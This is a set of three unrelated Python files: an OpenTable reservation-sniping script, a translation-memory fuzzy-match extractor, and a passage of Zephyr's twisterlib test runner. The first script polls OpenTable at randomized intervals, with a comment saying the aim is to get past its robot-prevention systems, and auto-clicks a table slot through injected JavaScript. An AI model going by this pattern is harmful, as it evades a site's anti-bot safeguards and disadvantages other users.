noisemaker_command = 'paplay /usr/share/sounds/gnome/default/alerts/bark.ogg'
noisemaker_interval = 3 # in seconds
timeout = 5 # in seconds; timeout for web request
# I don't know what (if any) robot prevention systems OpenTable uses ...
minperiod = 3 # shortest interval between requests
maxperiod = 9 # longest interval between requests
def makequery (rid, date, people):
query_url = 'http://opentable.com/opentables.aspx?t=rest&r=%d&d=%s&p=%d'
return query_url % (rid, fmtdate (date), people)
def fmtdate (t):
q = time.localtime (t)
yr, mo, dy = q[:3]
hr, mn, sc = q[3:6]
if hr == 0:
hr = 12
sfx = 'AM'
elif hr < 12:
sfx = 'AM'
else:
hr -= 12
sfx = 'PM'
return '%d/%d/%d%%20%d:%02d:%02d%%20%s' % (mo, dy, yr, hr, mn, sc, sfx)
def parsedate (t):
mo, dy, yr, hr, mn, sc = [int (x) for x in t[:6]]
if t[6] == 'AM':
if hr == 12:
hr = 0
elif t[6] == 'PM':
if hr != 12:
hr += 12
return time.mktime ((yr, mo, dy, hr, mn, sc, 0, 0, -1))
# Derived values: computed after parsedate() is defined so it can be used at import time.
targetdate = parsedate (targetdate_spec)
mintime = targetdate - slop # override manually if you want
maxtime = targetdate + slop
assert mintime < targetdate
assert maxtime > targetdate
def findhits (n, f, targetdate):
datepattern = re.compile (r'\[\'(\d{1,2})\/(\d{1,2})\/(\d{4}) '
r'(\d{1,2})\:(\d{2})\:(\d{2}) ([AP]M)')
pounces = []
for l in f:
dmatches = re.findall (datepattern, l)
if not len (dmatches):
continue
for dt in dmatches:
date = parsedate (dt)
if date < mintime or date > maxtime:
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), '**rejecting**', fmtdate (date)
continue
score = abs (date - targetdate)
pmatch = '[\'%s/%s/%s %s:%s:%s %s\'' % dt
pounces.append ((score, date, pmatch))
pounces.sort (key=lambda t: t[0])
return pounces
def noisemaker ():
while True:
os.system (noisemaker_command)
time.sleep (noisemaker_interval)
def pounce (qurl, pmatch):
thr = threading.Thread (target=noisemaker)
thr.start ()
v = webkit.WebView ()
w = gtk.Window ()
w.connect ('destroy', lambda q: w.destroy)
w.set_size_request (1000, 600)
w.connect ('delete-event', lambda w, e: gtk.main_quit ())
s = gtk.ScrolledWindow ()
s.add (v)
w.add (s)
w.show_all ()
myscript = r'''
var lis = document.getElementsByTagName("li");
for (var i = 0; i < lis.length; i++) {
var a = lis[i].getAttribute ("a");
if (a != null) {
if (a.indexOf ("%s") == 0) {
Time_OnClick (lis[i], GridType.ResultsGrid);
break;
}
}
}
''' % pmatch
def finished (*args):
if v.get_load_status () != webkit.LOAD_FINISHED:
return
v.execute_script (myscript)
v.connect ('notify::load-status', finished)
v.open (qurl)
gtk.main ()
def iteration (n, targetdate):
br = mechanize.Browser ()
people = people_choices[n % len (people_choices)]
qurl = makequery (rid, targetdate, people)
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), 'R:', qurl
try:
br.open (qurl, timeout=timeout)
except mechanize.URLError:
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), '--> timeout'
return
pounces = findhits (n, br.response (), targetdate)
if not len (pounces):
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), '--> no results'
return
score, date, pmatch = pounces[0]
print n, time.strftime ('%Y/%m/%d %H:%M:%S'), 'GOT ONE:', date, pmatch, score
pounce (qurl, pmatch)
n = 0
while True:
try:
iteration (n, targetdate)
except Exception as e:
print >>sys.stderr, n, 'EXCEPTION:', e
time.sleep (random.uniform (minperiod, maxperiod))
n += 1
|
extract_fuzzy_matches.py
|
"""Given source and target TM files, extract fuzzy matches for a new input file by using a
variety of methods. You can use formal matching methods such as edit distance and set
similarity, as well as semantic fuzzy matching with sent2vec and Sentence Transformers."""
import logging
import multiprocessing
import time
from multiprocessing.context import Process
from operator import itemgetter
from pathlib import Path
from typing import List, Optional, Tuple
import editdistance
import SetSimilaritySearch
from nfr.fuzzy_matching.faiss_retriever import FaissRetriever
from tqdm import tqdm
logger = logging.getLogger("nfr")
class FuzzyMatcher:
def __init__(
self,
method: str,
maxmatch: int,
minscore: float,
n_setsim_candidates: int,
setsim_function: str,
threads: int,
model_name_or_path: Optional[str] = None,
faiss: Optional[str] = None,
use_cuda: bool = False,
query_multiplier: int = 2,
):
if method not in ["setsim", "setsimeditdist", "editdist", "sent2vec", "stransformers"]:
raise ValueError(
"Method should be one of the following: 'setsim', 'setsimeditdist', 'editdist', "
"'sent2vec', 'stransformers'"
)
if method in ["sent2vec", "stransformers"] and not (model_name_or_path and faiss):
raise ValueError(
"When using method 'sent2vec' or 'stransformers', the 'model_name_or_path' and 'faiss'"
" parameters must be provided"
)
self.match_count = 0
self.nomatch_count = 0
self.method = method
self.insrc_lines = []
self.tmsrc_lines = []
self.tmtgt_lines = []
self.maxmatch = maxmatch
self.minscore = minscore
self.n_setsim_candidates = n_setsim_candidates
self.setsim_function = setsim_function
self.n_threads = threads
self.index = None
self.model_name_or_path = model_name_or_path
self.faiss_f = faiss
self.faiss_retriever = None
self.use_cuda = use_cuda
self.query_multiplier = query_multiplier
self.results_q = None
if self.use_cuda and self.n_threads > 1:
raise ValueError(
"Cannot use 'use_cuda' alongside multithreading ('n_threads' > 1). Either use 'use_cuda',"
" or 'n_threads' but not at the same."
)
def _get_unique_chunks(self, input_lines) -> List:
"""Split a list of unique items into N equal parts
:param input_lines: list of unique items
:return: list of lists (of size "n_threads")
"""
unique_lines = list(set(input_lines))
length = len(unique_lines)
logger.info("No. unique segments in 'insrc' = " + str(length))
return [
unique_lines[i * length // self.n_threads : (i + 1) * length // self.n_threads]
for i in range(self.n_threads)
]
def _init_setsim_index(self, tmsrc_lines):
"""
Initialize SetSimilarity Search index
"""
if self.method in ["setsimeditdist", "setsim"]:
# Initialize setsim search index using TM source
segset = []
for line in tmsrc_lines:
tokens = line.strip().split()
segset.append(tokens)
index = SetSimilaritySearch.SearchIndex(
segset, similarity_func_name=self.setsim_function, similarity_threshold=self.minscore
)
self.index = index
@staticmethod
def _tuple2string(tup: Tuple) -> str:
"""
Convert a tuple of tokens to string
:param tup: an existing tuple
:return: string
"""
new_tup = tuple(
str(x).replace("\t", " ") for x in tup
) # replace all tabs with spaces before using the tab as delimiter
new_tup_str = "\t".join(new_tup)
return new_tup_str
@staticmethod
def _readlines(fin):
with open(fin, encoding="utf-8") as fhin:
lines = fhin.readlines()
return lines
@staticmethod
def _remove_duplicate_matches(matches):
# format of matches_list: (source, id, candidate, tmtgt_lines[id].strip(), final_score)
seen_translations = set()
matches_unique_translations = list()
for item in matches:
# Translation is stored at item with index -2
translation = item[-2]
if translation in seen_translations:
continue
else:
matches_unique_translations.append(item)
seen_translations.add(translation)
return matches_unique_translations
@staticmethod
def _get_editdistance(source: str, candidate: str) -> float:
"""
Get editdistance score between two lists of word tokens
:param source: list of tokens for the input sentence
:param candidate: list of tokens for the candidate sentence
:return: return editdistance score (normalized on sentence length)
"""
candidate = candidate.split()
source = source.split()
ed = editdistance.eval(source, candidate)
maxlength = max(len(source), len(candidate))
ed_norm = (maxlength - ed) / maxlength
return ed_norm
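# Worked example (illustrative): for source "the cat sat on the mat" and candidate
# "the cat sat on a mat", editdistance.eval over the token lists is 1 and the longer
# sentence has 6 tokens, so the normalized score is (6 - 1) / 6 ≈ 0.83.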
def _init_data(self, insrc, tmsrc, tmtgt):
"""Initialize instance attributes based on the input that `process` received"""
self.tmsrc_lines = self._readlines(tmsrc)
self.tmtgt_lines = self._readlines(tmtgt)
if len(self.tmsrc_lines) != len(self.tmtgt_lines):
raise ValueError("No. lines in tmsrc and tmtgt are not equal.")
self.insrc_lines = self._readlines(insrc)
def _init_index(self):
if self.method in ["sent2vec", "stransformers"] and self.faiss_retriever is None:
self.faiss_retriever = FaissRetriever(
self.tmsrc_lines, self.tmtgt_lines, self.model_name_or_path, self.faiss_f, self.method, self.use_cuda
)
elif self.index is None:
self._init_setsim_index(self.tmsrc_lines)
def process(self, insrc, tmsrc, tmtgt):
start_time = time.time()
self._init_data(insrc, tmsrc, tmtgt)
self._init_index()
fout = f"{insrc}.matches.mins{self.minscore}.maxm{self.maxmatch}"
fout += (
f".{self.method}"
if self.method in ["sent2vec", "stransformers"]
else f".{self.setsim_function}{self.n_setsim_candidates}"
)
fout += ".txt"
with multiprocessing.Manager() as manager:
# Start queue where we'll `put` the results so that the writer can `get` them
self.results_q = manager.Queue()
# Separate writer process for efficiency reasons
# (Might not matter _that_ much depending on your chosen batch size)
writer_proc = Process(target=self._writer, args=(fout,))
writer_proc.start()
# If we only use 0/1 thread, just run in the main thread. This will ensure that we do not run into issues
# with FAISS on GPU when using use_cuda
if self.n_threads < 2:
self._match(self.insrc_lines, 0)
else:
# Get the unique source sentences in insrc and split the data into chunks for multithreading
unique_insrc_chunks = self._get_unique_chunks(self.insrc_lines)
arg_list = []
for i in range(self.n_threads):
arg_list.append((unique_insrc_chunks[i], i))
processes = []
for i in range(self.n_threads):
p = multiprocessing.Process(target=self._match, args=arg_list[i])
processes.append(p)
p.start()
for process in processes:
process.join()
self.results_q.put("done")
writer_proc.join()
writer_proc.terminate()
logger.info("Extracting fuzzy matches took " + str(time.time() - start_time) + " to run")
def _writer(self, fout):
"""The writer process that writes the output as the expected format.
Intended to be run in a separate process that reads input from a queue and writes
it to an output file."""
with Path(fout).open("w", encoding="utf-8") as fhout:
while True:
# Fetch items from the queue
m = self.results_q.get()
# `break` if the item is 'done' (put there in `self.process()`)
if m == "done":
break
for tup in m:
tup_str = self._tuple2string(tup)
fhout.write(tup_str + "\n")
fhout.flush()
logger.info(f"Output written to {fout}")
def _match(self, input_lines, thread_id):
# Only show progress bar for the first process.
for i in tqdm(range(len(input_lines)), disable=thread_id != 0, desc="Progress process #0"):
matches = []
source = input_lines[i].strip()
source_tok = source.split()
if self.method in ["sent2vec", "stransformers"]:
matches = self.faiss_retriever.search(source, self.maxmatch, self.minscore, self.query_multiplier)
else:
if self.index is not None:
# Query the setsim index to collect high fuzzy match candidates
result = self.index.query(source_tok)
# Query result the format [(matchindex, similarity score)]
# Sort the results on similarity score
result.sort(key=itemgetter(1), reverse=True)
# Take the most similar n matches
result = result[: self.n_setsim_candidates]
# Get the similarity score for each candidate
for r in result:
idx = r[0]
# Keep the original string to write
candidate = self.tmsrc_lines[idx].strip()
# Skip if source and candidate are the same
if source == candidate:
continue
if self.method == "setsim":
# Keep setsim score
final_score = r[1]
elif self.method == "setsimeditdist":
# Calculate editdistance
final_score = self._get_editdistance(source, candidate)
else:
# unreachable for the validated methods above; skip rather than reuse a stale score
continue
# keep the match if within the threshold
if self.minscore <= final_score:
matches.append((source, idx, candidate, self.tmtgt_lines[idx].strip(), final_score))
# Get matches using editdistance only
elif self.method == "editdist":
for j in range(len(self.tmsrc_lines)):
candidate = self.tmsrc_lines[j].strip()
# Skip if source and candidate are the same
if source == candidate:
continue
ed_norm = self._get_editdistance(source, candidate)
if self.minscore <= ed_norm:
matches.append((source, j, candidate, self.tmtgt_lines[j].strip(), ed_norm))
if matches:
self.match_count += 1
# Keep matches only with unique translations (keep only one element with the same translation)
matches = self._remove_duplicate_matches(matches)
# Sort the matches based on match score and keep the best matches (maxmatch)
sorted_matches = sorted(matches, key=lambda x: (x[-1]), reverse=True)
matches = sorted_matches[: self.maxmatch]
else:
self.nomatch_count += 1
self.results_q.put(matches)
return
def main():
import argparse
cparser = argparse.ArgumentParser(description=__doc__)
cparser.add_argument(
"--tmsrc", help="Source text of the TM from which fuzzy matches will be extracted", required=True
)
cparser.add_argument(
"--tmtgt", help="Target text of the TM from which fuzzy matches will be extracted", required=True
)
cparser.add_argument(
"--insrc", help="Input source file to extract matches for (insrc is queried against tmsrc)", required=True
)
cparser.add_argument(
"--method",
help="Method to find fuzzy matches",
choices=["editdist", "setsim", "setsimeditdist", "sent2vec", "stransformers"],
required=True,
)
cparser.add_argument(
"--minscore",
help="Min fuzzy match score. Only matches with a" " similarity score of at least 'minscore' will be included",
required=True,
type=float,
)
cparser.add_argument(
"--maxmatch", help="Max number of fuzzy matches kept per source segment", required=True, type=int
)
cparser.add_argument(
"--model_name_or_path",
help="Path to sent2vec model (when `method` is sent2vec) or sentence-transformers model name"
" when method is stransformers (see https://www.sbert.net/docs/pretrained_models.html)",
)
cparser.add_argument(
"--faiss", help="Path to faiss index. Must be provided when `method` is sent2vec or stransformers"
)
cparser.add_argument(
"--threads", help="Number of threads. Must be 0 or 1 when using `use_cuda`", default=1, type=int
)
cparser.add_argument(
"--n_setsim_candidates", help="Number of fuzzy match candidates extracted by setsim", type=int, default=2000
)
cparser.add_argument(
"--setsim_function", help="Similarity function used by setsimsearch", type=str, default="containment_min"
)
cparser.add_argument(
"--use_cuda",
action="store_true",
help="Whether to use GPU for FAISS indexing and sentence-transformers. For this to work"
" properly `threads` should be 0 or 1.",
)
cparser.add_argument(
"-q",
"--query_multiplier",
help="(applies only to FAISS) Initially look for `query_multiplier * maxmatch`"
" matches to ensure that we find enough hits after filtering. If still not"
" enough matches, search the whole index",
type=int,
default=2,
)
cparser.add_argument(
"-v",
"--logging_level",
choices=["info", "debug"],
help="Set the information level of the logger. 'info' shows trivial information about the process. 'debug'"
" also notifies you when less matches are found than requested during semantic matching ",
default="info",
)
cargs = cparser.parse_args()
logger.setLevel(cargs.logging_level.upper())
matcher = FuzzyMatcher(
cargs.method,
cargs.maxmatch,
cargs.minscore,
cargs.n_setsim_candidates,
cargs.setsim_function,
cargs.threads,
cargs.model_name_or_path,
cargs.faiss,
cargs.use_cuda,
cargs.query_multiplier,
)
matcher.process(cargs.insrc, cargs.tmsrc, cargs.tmtgt)
if __name__ == "__main__":
main()
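# Example invocation (illustration only; the script and file names below are
# hypothetical, and the model name is just one possible choice):
#
#   python fuzzymatcher.py --tmsrc tm.src --tmtgt tm.tgt --insrc input.src \
#       --method setsimeditdist --minscore 0.5 --maxmatch 2 \
#       --n_setsim_candidates 2000 --threads 4
#
# For the semantic methods a model and a FAISS index are required as well, e.g.:
#
#   python fuzzymatcher.py --tmsrc tm.src --tmtgt tm.tgt --insrc input.src \
#       --method stransformers --model_name_or_path all-MiniLM-L6-v2 \
#       --faiss tm.faiss --minscore 0.5 --maxmatch 2 --threads 1 --use_cuda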
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
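# Minimal usage sketch (illustration only, not part of twister): each counter
# in ExecutionCounter is backed by a multiprocessing.Value, and every property
# read or write above acquires that Value's own lock, so concurrent workers
# can update the shared totals without corrupting them.
def _execution_counter_demo():
    counter = ExecutionCounter(total=4)
    # Each attribute access below goes through a locked getter/setter; note
    # that a read-modify-write like "+= 1" is still two separate locked steps.
    counter.passed = counter.passed + 1
    counter.skipped_configs += 1
    return counter.passed, counter.skipped_configs, counter.total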
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
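# Minimal sketch (illustration only): how CMakeCacheEntry.from_line() applies
# the type conversions documented in the class docstring. The cache lines used
# here are made up for the example.
def _cmake_cache_entry_demo():
    entry = CMakeCacheEntry.from_line('CONFIG_DEBUG:BOOL=ON', line_no=1)
    assert entry.name == 'CONFIG_DEBUG' and entry.value  # BOOL 'ON' -> truthy
    entry = CMakeCacheEntry.from_line('MY_LIST:STRING=a;b;c', line_no=2)
    assert entry.value == ['a', 'b', 'c']  # ';'-separated STRING -> list of str
    # Comment lines and blank lines do not produce entries
    assert CMakeCacheEntry.from_line('# generated by CMake', line_no=3) is None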
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
self.terminated = False
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def add_missing_testscases(self, harness):
"""
If the testsuite was broken by some error (e.g. timeout), it is necessary to
add information about the remaining testcases, which were not
performed due to this error.
"""
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed because when the simulator is killed, the console is
# left garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.add_missing_testscases(harness)
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or not (d.serial or d.serial_pty):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
